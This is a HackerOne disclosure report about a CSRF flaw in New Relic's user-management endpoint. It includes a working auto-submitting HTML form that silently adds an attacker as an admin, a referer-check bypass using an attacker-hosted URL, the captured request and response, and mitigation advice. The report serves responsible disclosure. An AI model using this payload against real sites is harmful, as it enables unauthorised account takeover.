New Relic: CSRF For Adding Users

2017-05-01T15:54:48
ID H1:225326
Type hackerone
Reporter atestpk
Modified 2017-10-11T22:54:42

Description

Issue The API affected is https://rpm.newrelic.com/accounts/{{accountid}}/account_views.

Only admin users are allowed to add other new users, but a normal user with knowledge of the accountid can craft a webpage which does a CSRF when an admin user visits it.

There are 2 problems with it that can result in CSRF: 1. No check for authenticity_token 2. There is a referer header check but it is flawed. http://attacker.com/rpm.newrelic.com/ will bypass that.

PoC (replace accountid and host on a url that contains rpm.newrelic.com) ``` <html> <iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<form name="adduser" action="https://rpm.newrelic.com/accounts/accountid/account_views" method="post" target="csrf-frame"> <input type="submit"> <input type="hidden" name="utf8" value="✓"> <input type="hidden" name="id" value="accountid"> <input type="hidden" name="account_view[user][email]" value="attacker@gmail.com"> <input type="hidden" name="account_view[user][full_name]" value="attacker"> <input type="hidden" name="account_view[level]" value="admin"> <input type="hidden" name="account_view[user][job_title]" value=""> </form>

<script> document.forms.adduser.submit(); </script> </html> ```

An admin who visits this will add attacker@gmail.com as an admin to the group.

CSRF Request and response ``` POST /accounts/1621740/account_views HTTP/1.1 Host: rpm.newrelic.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 196 Referer: http://redirectxss.herokuapp.com/rpm.newrelic.com/csrftest [.......]

utf8=%E2%9C%93&id=1621740&account_view%5Buser%5D%5Bemail%5D=attacker%40gmail.com&account_view%5Buser%5D%5Bfull_name%5D=attacker&account_view%5Blevel%5D=admin&account_view%5Buser%5D%5Bjob_title%5D=

==>

HTTP/1.1 302 Found Server: nginx Date: Mon, 01 May 2017 15:48:12 GMT Content-Type: text/html; charset=utf-8 Connection: Keep-Alive Status: 302 Found X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Location: https://rpm.newrelic.com/accounts/1621740 [.....]

<html><body>You are being <a href="https://rpm.newrelic.com/accounts/1621740">redirected</a>.</body></html> ``````

The following POST request is successful as it redirects to https://rpm.newrelic.com/accounts/1621740.

Mitigation Check the CSRF token. Check the referer url to see if it starts with rpm.newrelic.com (or other whitelist of domains)